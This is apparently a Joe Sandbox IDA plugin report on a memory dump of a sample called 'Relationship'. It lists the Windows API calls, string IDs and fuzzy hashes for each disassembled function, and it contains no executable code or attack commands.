                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                            • Opcode ID: dd83cba57bae019d991d23bda639f453c4eb1cbb8cbc3582258c30be40a7e381
                                                                                                                                                                                                                                                                            • Instruction ID: 04071b8ad5b9a5666e8d28c46c644f7fe6ad7d0ea961b19f1b2b1f50e61a58d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd83cba57bae019d991d23bda639f453c4eb1cbb8cbc3582258c30be40a7e381
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF03032241158BBE7215752AC0EFEF3B7CEFC6B21F000058F612910D0E7A06A41D7B9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 00C334EF
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C33506
                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00C33512
                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00C33521
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C33533
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 00C3354D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                            • Opcode ID: c3993455e908ae94cbbe21c84bd3fc50e8526d78850eb9dc53e02a843197edf8
                                                                                                                                                                                                                                                                            • Instruction ID: 5d445cf74379091ce43a97098f2e20b8e740cd7e654ca92a4af0a6c52cfb8ca8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3993455e908ae94cbbe21c84bd3fc50e8526d78850eb9dc53e02a843197edf8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2012431500209EFEB506FA4DC08FEE7BB6FF08321F510561FA2AA21E0CB321E51AB14
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C521CC
                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C521D8
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C521E1
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C521E9
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C521F2
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C521F9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8dbfbb89ee219169adfed8c0495de2919499ea496147b98c33203aad05b32910
                                                                                                                                                                                                                                                                            • Instruction ID: b5a1d2bf75aaf6a343f5e6cb986ec564f214fc307b216533ac470a9daf927839
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dbfbb89ee219169adfed8c0495de2919499ea496147b98c33203aad05b32910
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E07576104505BBDB012FA5EC0DF4EBF79FF49732B504625F226824B4CB329861EB59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5CF99
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5CFE0
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5D047
                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C5D075
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 031eebc26027cff54c55115a8ec82664c2d03897bacb7e9bb97015007a62df93
                                                                                                                                                                                                                                                                            • Instruction ID: 99c8ae077c5b8be87b31aec2ba1b0e8abac4d3e4aff8c6383d867439868ad111
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 031eebc26027cff54c55115a8ec82664c2d03897bacb7e9bb97015007a62df93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E51C1756043009FD724AE64C885B6FB7E8EB85316F040A2DFDA6D31D0DBB0CAC9975A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00C7B903
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00C7B998
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7B9C7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                            • Opcode ID: 89b9cddd47038f2b947093dc02b90a69558b5cb8c0594dfb1c05802acdd8209b
                                                                                                                                                                                                                                                                            • Instruction ID: b5ed2b76269d0b3e8c6361d3cb4af68c9be5ba494f072ba4eb42dd3296c9f0fe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89b9cddd47038f2b947093dc02b90a69558b5cb8c0594dfb1c05802acdd8209b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0714A75A00219DFCB14DF54C494AAEBBF5FF08310F048499E96AAB391CB74EE45CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C57B6D
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C57BA3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C57BB4
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C57C36
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                            • Opcode ID: 4301b9d0f3cfb0984fa9c3d9e396fc924cbd5910a96be6fdb34f61c499b0fbed
                                                                                                                                                                                                                                                                            • Instruction ID: dccc784ee8310713c5a2ea59cce497d6a0a2d55ad69c5575e9cab0fea00c64be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4301b9d0f3cfb0984fa9c3d9e396fc924cbd5910a96be6fdb34f61c499b0fbed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6141C575604204DFDB15CF25E888B9A7BB9EF44312F1081A9AC069F245D7B0EDC8CBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C848D1
                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00C848E6
                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C8492E
                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00C84941
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: beaa638b99c0b6905c377809c9da03aebffbae6ed841b588f17101c73499b089
                                                                                                                                                                                                                                                                            • Instruction ID: 9c73f46078c03cb01db07e7e17bf122455bc2a112f7ca235c6ebf13c01f558ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beaa638b99c0b6905c377809c9da03aebffbae6ed841b588f17101c73499b089
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43415B75A0020AEFDB24EF51D884EABBBB9FF16328F044129F95597290D730EE54CB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C527B3
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C527C6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C527F6
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 27e4d89e457c65148e1a23366fafe3f9963972dad2a8cb7d5a10ba508572b769
                                                                                                                                                                                                                                                                            • Instruction ID: 35029aec81e1d8a60d174c22a12c3fa7c0dc95721061536e190d8950faef7719
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27e4d89e457c65148e1a23366fafe3f9963972dad2a8cb7d5a10ba508572b769
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C21F37A940108BFDB09ABA0D846DFF77F8DF46361F104129F922A71E1DB38498E9764
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C83A29
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00C83A30
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C83A45
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C83A4D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C1508E,?,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002), ref: 00C150FD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C15110
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00C1508E,?,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002,00000000), ref: 00C15133
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF664A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF665C
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF666E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6610
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF6622
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6635
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C635C4
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00C63646
                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C6365C
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C6366D
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C6367F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                            • Opcode ID: c48d582c86c79e85bd7347aad356c9081d3f8599dbd50fdf55834827cefd14cf
                                                                                                                                                                                                                                                                            • Instruction ID: 665f7d5fe5acc2220715ea659b6d6aa90a70a97cbf24e0be7f8f72a34ae7e952
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c48d582c86c79e85bd7347aad356c9081d3f8599dbd50fdf55834827cefd14cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2B14F72D00119ABDF21DBA4CC85EEEBBBDEF49350F1040A6F60AE7151EA349B449F61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00C7AE87
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C7AE95
                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C7AEC8
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C7B09D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                            • Opcode ID: a978beeeaa7c1d40dfcdee8c64837e967ca1981d8b226f0edfa35f0b6e284ffe
                                                                                                                                                                                                                                                                            • Instruction ID: e9024364e0b75ac40e8088d05a4d9fdeca2c09f69ed3941ead3c06ad8daa6607
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a978beeeaa7c1d40dfcdee8c64837e967ca1981d8b226f0edfa35f0b6e284ffe
